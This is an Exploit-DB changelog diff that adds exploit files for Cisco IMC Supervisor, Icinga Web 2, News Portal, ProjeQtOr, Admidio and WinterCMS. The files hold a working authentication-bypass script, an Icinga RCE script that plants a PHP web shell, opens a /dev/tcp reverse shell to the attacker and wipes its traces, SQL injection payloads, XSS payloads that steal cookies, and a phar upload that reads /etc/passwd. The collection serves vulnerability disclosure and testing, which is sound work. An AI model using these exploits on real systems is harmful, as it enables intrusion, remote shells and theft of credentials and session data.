DB: 2023-07-16

9 changes to exploits/shellcodes/ghdb

Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass

Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

Admidio v4.2.10 - Remote Code Execution (RCE)
Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
Bus Pass Management System 1.0 - 'viewid' SQL Injection
Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)
Bus Pass Management System 1.0 - 'viewid' SQL Injection

Icinga Web 2.10 - Authenticated Remote Code Execution

News Portal v4.0 - SQL Injection (Unauthorized)

Pluck v4.7.18 - Remote Code Execution (RCE)

ProjeQtOr Project Management System v10.4.1 - Multiple XSS

WinterCMS < 1.2.3 - Persistent Cross-Site Scripting

XAMPP 8.2.4 - Unquoted Path

exploits/hardware/webapps/51589.txt

@@ -0,0 +1,64 @@
+[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass
+[+] Cisco IMC Supervisor - < 2.2.1.0
+[+] Date: 08/21/2019
+[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo
+[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html
+[+] Vulnerability Discovery : Pedro Ribeiro
+[+] Exploit Author: Fatih Sencer
+[+] CVE: CVE-2019-1937
+----------------------------------------------------
+
+Usage:
+
+./python3 CiscoIMC-Bypass.py -u host
+
+[+] Target https://xxxxxx.com
+[+] Target OK
+[+] Exploit Succes
+[+] Login name : admin
+[+] Cookie : REACTED
+
+"""
+
+import argparse,requests,warnings,base64,json,random,string
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+warnings.simplefilter('ignore',InsecureRequestWarning)
+
+
+def init():
+    parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')
+    parser.add_argument('-u','--host',help='Host', type=str, required=True)
+    args = parser.parse_args()
+    exploit(args)
+
+def exploit(args):
+    session = requests.Session()
+    headers = {
+        "User-Agent":                   "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",
+        "X-Requested-With":             "XMLHttpRequest",
+        "Referer":                      "https://{}/".format(args.host),
+        "X-Starship-UserSession-Key":   ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),
+        "X-Starship-Request-Key":   ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
+    }
+    target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)
+    print("[+] Target {}".format(args.host))
+
+    exp_send = session.get(target, headers=headers, verify=False, timeout=10)
+
+    if exp_send.status_code == 200:
+        print("[+] Target OK")
+        body_data = json.loads(exp_send.text)
+        if not (body_data.get('loginName') is None):
+            print("[+] Exploit Succes")
+            print("[+] Login name : {}".format(body_data.get('loginName')))
+            print("[+] Cookie : {}".format(session.cookies.get_dict()))
+        else:
+            print("[-] Exploit Failed")
+
+    else:
+        print("[-] N/A")
+        exit()
+
+if __name__ == "__main__":
+    init()

exploits/php/webapps/51586.py

@@ -0,0 +1,153 @@
+#!/usr/bin/env python3
+
+# Exploit Title: Icinga Web 2.10 - Authenticated Remote Code Execution
+# Date: 8/07/2023
+# Exploit Author: Dante Corona(Aka. cxdxnt)
+# Software Link: https://github.com/Icinga/icingaweb2
+# Vendor Homepage: https://icinga.com/
+# Software Link: https://github.com/Icinga/icingaweb2
+# Version: <2.8.6, <2.9.6, <2.10
+# Tested on: Icinga Web 2 Version 2.9.2 on Linux
+# CVE: CVE-2022-24715
+# Based on: https://nvd.nist.gov/vuln/detail/CVE-2022-24715
+
+import requests,argparse,re,random,string
+from colorama import Fore,Style
+
+def letter_random():
+    letras = string.ascii_lowercase
+    character_random = random.choices(letras, k=6)
+    return ''.join(character_random)
+
+
+def users_url_password():
+    parser = argparse.ArgumentParser(description='Descripción de tu programa.')
+    parser.add_argument('-u', '--url',type=str,required=True, help='Insertar la URL http://ip_victima')
+    parser.add_argument('-U', '--user',type=str, required=True ,help='Insertar usuario -U user')
+    parser.add_argument('-P', '--password',type=str, required=True ,help='Insertar contraseña -P password')
+    parser.add_argument('-i', '--ip',type=str,required=True,help='Insertar IP de atacante -i IP')
+    parser.add_argument('-p','--port',type=str, required=True,help='Insertar puerto de atacante -p PORT')
+    args = parser.parse_args()
+    url = args.url
+    user = args.user
+    password=args.password
+    ip_attack = args.ip
+    port_attack = args.port
+
+    return url,user,password,ip_attack,port_attack
+
+def login(url,user,password):
+    try:
+        login_url = url + "/icingaweb2/authentication/login"
+        session = requests.Session()
+        r = session.get(login_url)
+        csrf_regex = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]
+        data_post = {"username":user,
+                    "password":password,
+                    "CSRFToken":csrf_regex,
+                    "formUID":"form_login",
+                    "btn_submit":"Login"
+                    }
+        response = session.post(login_url,data=data_post)
+        if "Welcome to Icinga Web!" in response.text:
+            print(f"{Fore.GREEN}[*]{Style.RESET_ALL}Session successfully.")
+            r = session.get(login_url)
+        else:
+            print("[!]Failed to login.")
+            exit(1)
+        #return session,csrf_regex
+    except requests.exceptions.InvalidURL:
+        print(f"{Fore.YELLOW}[!]{Style.RESET_ALL} Error URL :(")
+        exit(1)
+    return session,csrf_regex
+
+def upload_file(session,url,character_random,csrf_regex):
+    webshell = f"""-----BEGIN RSA PRIVATE KEY-----
+MIIBOgIBAAJBAKj34GkxFhD90vcNLYLInFEX6Ppy1tPf9Cnzj4p4WGeKLs1Pt8Qu
+KUpRKfFLfRYC9AIKjbJTWit+CqvjWYzvQwECAwEAAQJAIJLixBy2qpFoS4DSmoEm
+o3qGy0t6z09AIJtH+5OeRV1be+N4cDYJKffGzDa88vQENZiRm0GRq6a+HPGQMd2k
+TQIhAKMSvzIBnni7ot/OSie2TmJLY4SwTQAevXysE2RbFDYdAiEBCUEaRQnMnbp7
+9mxDXDf6AU0cN/RPBjb9qSHDcWZHGzUCIG2Es59z8ugGrDY+pxLQnwfotadxd+Uy
+v/Ow5T0q5gIJAiEAyS4RaI9YG8EWx/2w0T67ZUVAw8eOMB6BIUg0Xcu+3okCIBOs
+/5OiPgoTdSy7bcF9IGpSE8ZgGKzgYQVZeN97YE00
+-----END RSA PRIVATE KEY-----
+<?php system($_REQUEST["%s"]);?>
+"""%character_random
+    upload_url = url + "/icingaweb2/config/createresource"
+    r = session.get(upload_url)
+    csrf = re.findall(r'name="CSRFToken" value="([^"]*)"',r.text)[0]
+    data_post ={"type":"ssh",
+                "name":"shm/"+character_random,
+                "user":f"../../../../../../../../../../../dev/shm/{character_random}/run.php",
+                "private_key":webshell,
+                "formUID":"form_config_resource",
+                "CSRFToken":csrf,
+                "btn_submit":"Save Changes"
+                }
+    upload_response = session.post(upload_url,data=data_post)
+    check = requests.get(url + f"/icingaweb2/lib/icinga/icinga-php-thirdparty/dev/shm/{character_random}/run.php")
+    if check.status_code != 200 :
+        print(f"{Fore.YELLOW}[!]{Style.RESET_ALL}Error uploading file. :(")
+        exit(1)
+    else:
+        print(f"{Fore.GREEN}[*]{Style.RESET_ALL}File uploaded successfully.")
+
+def enable_module(session,url,character_random):
+    url_module = url+"/icingaweb2/config/general"
+    r_module = session.get(url_module)
+    csrf_module = re.findall(r'name="CSRFToken" value="([^"]*)"',r_module.text)[0]
+    data_post = {"global_show_stacktraces":"0",
+                 "global_show_stacktraces":"1",
+                 "global_show_application_state_messages":"0",
+                 "global_show_application_state_messages":"1",
+                 "global_module_path":"/dev/shm/",
+                 "global_config_resource":"icingaweb2",
+                 "logging_log":"none",
+                 "themes_default":"Icinga",
+                 "themes_disabled":"0",
+                 "authentication_default_domain":"",
+                 "formUID":"form_config_general",
+                 "CSRFToken":f"{csrf_module}",
+                 "btn_submit":"Save Changes"
+                 }
+
+    resul = session.post(url_module,data_post)
+    #--------------------------------------------------
+    url_enable = url +"/icingaweb2/config/moduleenable"
+    r_enable = session.get(url_enable)
+    csrf_enable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_enable.text)[0]
+    data_enable = {"identifier":f"{character_random}","CSRFToken":f"{csrf_enable}","btn_submit":"btn_submit"}
+    resul_enable = session.post(url_enable,data_enable)
+
+
+def reverse_shell(session,url,ip_attack,port_attack,character_random):
+    reverse_url = url + "/icingaweb2/dashboard"
+    reverse_exe_one = reverse_url + f'?{character_random}=echo+"bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{ip_attack}%2F{port_attack}%200%3E%261"+>+/tmp/{character_random}'
+    reverse_exe_two = reverse_url + f"?{character_random}=bash+/tmp/{character_random} &"
+    reverse_response_one = session.get(reverse_exe_one)
+    try:
+        reverse_response_two = session.get(reverse_exe_two, timeout=5)
+    except:
+        print(f"{Fore.RED}[*]{Style.RESET_ALL}Eliminating evidence")
+
+    remove = session.get(reverse_url + f"?{character_random}=rm+/tmp/{character_random}")
+    disable_url = url + "/icingaweb2/config/moduledisable"
+    r_disable = session.get(disable_url)
+    csrf_disable = re.findall(r'name="CSRFToken" value="([^"]*)"',r_disable.text)[0]
+    data_disable = {"identifier":f"{character_random}","CSRFToken":csrf_disable,"btn_submit":"btn_submit"}
+    response_disable = session.post(disable_url,data=data_disable)
+
+
+
+def disable_module(session,url,character_random):
+    url_disable = url + "/icingaweb2/config/moduledisable"
+
+
+
+if __name__ == '__main__':
+    character_random = letter_random()
+    url,user,password,ip_attack,port_attack = users_url_password()
+    session,csrf_regex = login(url,user,password)
+    upload_file(session,url,character_random,csrf_regex)
+    enable_module(session,url,character_random)
+    reverse_shell(session,url,ip_attack,port_attack,character_random)

exploits/php/webapps/51587.txt

@@ -0,0 +1,234 @@
+# Exploit Title: News Portal v4.0 - SQL Injection (Unauthorized)
+# Date: 09/07/2023
+# Exploit Author: Hubert Wojciechowski
+# Contact Author: hub.woj12345@gmail.com
+# Vendor Homepage: https://phpgurukul.com/news-portal-project-in-php-and-mysql/c
+# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=7643
+# Version: 4.0
+# We are looking for work security engineer, security administrator: https://www.pracuj.pl/praca/security-engineer-warszawa-plocka-9-11,oferta,1002635314
+# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
+
+## Example  1
+-----------------------------------------------------------------------------------------------------------------------
+Param: name, email, comment
+-----------------------------------------------------------------------------------------------------------------------
+Req
+-----------------------------------------------------------------------------------------------------------------------
+POST /newsportal/news-details.php?nid=13 HTTP/1.1
+Origin: http://127.0.0.1
+Sec-Fetch-User: ?1
+Host: 127.0.0.1:80
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Accept-Encoding: gzip, deflate
+Sec-Fetch-Site: same-origin
+sec-ch-ua-mobile: ?0
+Content-Length: 277
+Sec-Fetch-Mode: navigate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Connection: close
+Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+sec-ch-ua-platform: "Windows"
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
+Sec-Fetch-Dest: document
+
+csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))''&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
+-----------------------------------------------------------------------------------------------------------------------
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Sun, 09 Jul 2023 10:55:26 GMT
+Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
+X-Powered-By: PHP/8.1.17
+Set-Cookie: PHPSESSID=l7dg3s1in50ojjigs4vm2p0r9s; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 146161
+
+<script>alert('comment successfully submit. Comment will be display after admin review ');</script>
+<!DOCTYPE html>
+<html lang="en">
+
+  <head>
+
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+    <meta name="description" content="">
+    <meta name="author" content="">
+
+    <title>News Portal | Home Page
+	[...]
+
+-----------------------------------------------------------------------------------------------------------------------
+Req
+-----------------------------------------------------------------------------------------------------------------------
+POST /newsportal/news-details.php?nid=13 HTTP/1.1
+Origin: http://127.0.0.1
+Sec-Fetch-User: ?1
+Host: 127.0.0.1:80
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Accept-Encoding: gzip, deflate
+Sec-Fetch-Site: same-origin
+sec-ch-ua-mobile: ?0
+Content-Length: 276
+Sec-Fetch-Mode: navigate
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Connection: close
+Referer: http://127.0.0.1/newsportal/news-details.php?nid=13
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+sec-ch-ua-platform: "Windows"
+Cache-Control: max-age=0
+Content-Type: application/x-www-form-urlencoded
+sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
+Sec-Fetch-Dest: document
+
+csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=(SELECT%20(CASE%20WHEN%20(8137%3d6474)%20THEN%200x73647361646173646173%20ELSE%20(SELECT%206474%20UNION%20SELECT%201005)%20END))'&email=admin%40local.host&comment=ssssssssssssssssssssssssss&submit
+-----------------------------------------------------------------------------------------------------------------------
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Sun, 09 Jul 2023 10:56:06 GMT
+Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
+X-Powered-By: PHP/8.1.17
+Set-Cookie: PHPSESSID=fcju4nb9mr2tu80mqv5cnduldk; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 525
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<br />
+<b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'admin@local.host','ssssssssssssssssssssssssss','0')' at line 1 in C:\xampp3\htdocs\newsportal\news-details.php:21
+Stack trace:
+#0 C:\xampp3\htdocs\newsportal\news-details.php(21): mysqli_query(Object(mysqli), 'insert into tbl...')
+#1 {main}
+  thrown in <b>C:\xampp3\htdocs\newsportal\news-details.php</b> on line <b>21</b><br />w
+-----------------------------------------------------------------------------------------------------------------------
+SQLMap example param 'comment':
+-----------------------------------------------------------------------------------------------------------------------
+sqlmap identified the following injection point(s) with a total of 450 HTTP(s) requests:
+---
+Parameter: #2* ((custom) POST)
+    Type: boolean-based blind
+    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
+    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' RLIKE (SELECT (CASE WHEN (3649=3649) THEN 0x7373737373737373737373737373737373737373737373737373 ELSE 0x28 END)) AND 'xRsB'='xRsB&submit=
+
+    Type: error-based
+    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' OR (SELECT 6120 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(6120=6120,1))),0x7170717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'odEK'='odEK&submit=
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: csrftoken=400eb8ae07c6693e68d5f0f5b76920fff294c09d33e70526c7708609a51956dd&name=sdsadasdas&email=admin@local.host&comment=ssssssssssssssssssssssssss' AND (SELECT 1610 FROM (SELECT(SLEEP(5)))mZUx) AND 'bjco'='bjco&submit=
+---
+web application technology: PHP 8.1.17, Apache 2.4.56
+bacck-end DBMS: MySQL >= 5.0 (MariaDB fork)
+
+## Example 2 - login to administration panel
+-----------------------------------------------------------------------------------------------------------------------
+Param: username
+-----------------------------------------------------------------------------------------------------------------------
+Req
+-----------------------------------------------------------------------------------------------------------------------
+POST /newsportal/admin/ HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 42
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1/newsportal/admin/
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
+Connection: close
+
+username=admin'&password=Test%40123&login=
+-----------------------------------------------------------------------------------------------------------------------
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Sun, 09 Jul 2023 11:00:53 GMT
+Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
+X-Powered-By: PHP/8.1.17
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 505
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<br />
+<b>Fatal error</b>:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'f925916e2754e5e03f75dd58a5733251')' at line 1 in C:\xampp3\htdocs\newsportal\admin\index.php:13
+Stack trace:
+#0 C:\xampp3\htdocs\newsportal\admin\index.php(13): mysqli_query(Object(mysqli), 'SELECT AdminUse...')
+#1 {main}
+  thrown in <b>C:\xampp3\htdocs\newsportal\admin\index.php</b> on line <b>13</b><br />
+-----------------------------------------------------------------------------------------------------------------------
+Req
+-----------------------------------------------------------------------------------------------------------------------
+POST /newsportal/admin/ HTTP/1.1
+Host: 127.0.0.1
+Content-Length: 43
+Cache-Control: max-age=0
+sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: http://127.0.0.1
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://127.0.0.1/newsportal/admin/
+Accept-Encoding: gzip, deflate
+Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: USERSUB_TYPE=0; IS_MODERATOR=0; REPLY_SORT_ORDER=ASC; SHOWTIMELOG=Yes; user_uniq_agent=95e1b7d0ab9086d6b88e9adfaacf07d887164827a5708adf; SES_ROLE=3; USER_UNIQ=117b06da2ff9aabad1a916992e92bb26; USERTYP=3; USERTZ=33; helpdesk_uniq_agent=%7B%22temp_name%22%3A%22test%22%2C%22email%22%3A%22test%40local.host%22%7D; CPUID=8dba9a451f44121c45180df414ab6917; DEFAULT_PAGE=dashboard; CURRENT_FILTER=cases; currency=USD; phpsessid-9795-sid=s7b0dqlpebu74ls14j61e5q3be; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1688869781; PHPSESSID=2vag12caoqvv76avbeslm65je8
+Connection: close
+
+username=admin''&password=Test%40123&login=
+-----------------------------------------------------------------------------------------------------------------------
+Res:
+-----------------------------------------------------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Sun, 09 Jul 2023 11:02:15 GMT
+Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
+X-Powered-By: PHP/8.1.17
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Content-Length: 4733
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+<script>alert('Invalid Details');</script>
+<!DOCTYPE html>
+<html lang="en">
+    <head>
+        <meta charset="utf-8">
+        <meta name="viewport" content="width=device-width, initial-scale=1.0">
+        <meta name="description" content="News Portal.">
+        <meta name="author" content="PHPGurukul">
+
+
+        <!-- App title -->
+        <title>News Portal | Admin Panel</title>
+[...]

exploits/php/webapps/51588.txt

@@ -0,0 +1,67 @@
+Exploit Title: ProjeQtOr Project Management System V10.4.1 - Multiple XSS
+Version: V10.4.1
+Bugs:  Multiple XSS
+Technology: PHP
+Vendor URL: https://www.projeqtor.org
+Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.4.1.zip/download
+Date of found: 09.07.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+
+                                     ### XSS-1 ###
+
+
+visit: http://localhost/projeqtor/view/refreshCronIconStatus.php?cronStatus=miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E&csrfToken=
+payload: miri%27);%22%3E%3Cscript%3Ealert(4)%3C/script%3E
+
+                                    ### XSS-2 ###
+
+steps:
+
+1. login to account
+2. go projects and create project
+3.add attachment
+3. upload svg file
+
+"""
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+"""
+4. Go to  svg file ( http://localhost/projeqtor/files/attach/attachment_5/malas.svg )
+
+
+                                       ### XSS-3 ###
+
+Go to below adress (post request)
+
+POST /projeqtor/tool/ack.php?destinationWidth=50&destinationHeight=0&isIE=&xhrPostDestination=resultDivMain&xhrPostIsResultMessage=true&xhrPostValidationType=attachment&xhrPostTimestamp=1688898776311&csrfToken= HTTP/1.1
+Host: localhost
+Content-Length: 35
+sec-ch-ua:
+Content-Type: application/x-www-form-urlencoded
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+sec-ch-ua-platform: ""
+Accept: */*
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/projeqtor/view/main.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=r5cjcsggl4j0oa9s70vchaklf3
+Connection: close
+
+resultAck=<script>alert(4)</script>

exploits/php/webapps/51590.txt

@@ -0,0 +1,59 @@
+Exploit Title: Admidio v4.2.10 - Remote Code Execution (RCE)
+Application: Admidio
+Version: 4.2.10
+Bugs:  RCE
+Technology: PHP
+Vendor URL: https://www.admidio.org/
+Software Link: https://www.admidio.org/download.php
+Date of found: 10.07.2023
+Author: Mirabbas Ağalarov
+Tested on: Linux
+
+
+2. Technical Details & POC
+========================================
+Steps:
+
+1. Login to account
+2. Go to Announcements
+3. Add Entry
+4. Upload .phar file in image upload section.
+.phar file Content
+<?php echo system('cat /etc/passwd');?>
+5. Visit .phar file  ( http://localhost/admidio/adm_my_files/announcements/images/20230710-172217_430o3e5ma5dnuvhp.phar )
+
+Request:
+
+POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1
+Host: localhost
+Content-Length: 378
+Cache-Control: max-age=0
+sec-ch-ua:
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: ""
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: iframe
+Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
+Connection: close
+
+------WebKitFormBoundaryne9TRuC1tAqhR86r
+Content-Disposition: form-data; name="upload"; filename="shell.phar"
+Content-Type: application/octet-stream
+
+<?php echo system('cat /etc/passwd');?>
+
+------WebKitFormBoundaryne9TRuC1tAqhR86r
+Content-Disposition: form-data; name="ckCsrfToken"
+
+o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
+------WebKitFormBoundaryne9TRuC1tAqhR86r--

exploits/php/webapps/51591.txt

@@ -0,0 +1,64 @@
+# Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting
+# Exploit Author: abhishek morla
+# Google Dork: N/A
+# Date: 2023-07-10
+# Vendor Homepage: https://wintercms.com/
+# Software Link: https://github.com/wintercms/winter
+# Version: 1.2.2
+# Tested on: windows64bit / mozila firefox
+# CVE : CVE-2023-37269
+# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3
+# Video POC : https://youtu.be/Dqhq8rdrcqc
+
+Title : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality
+
+Description :
+WinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script
+
+Payload:-
+// image.svg
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.cookie);
+   </script>
+</svg>
+
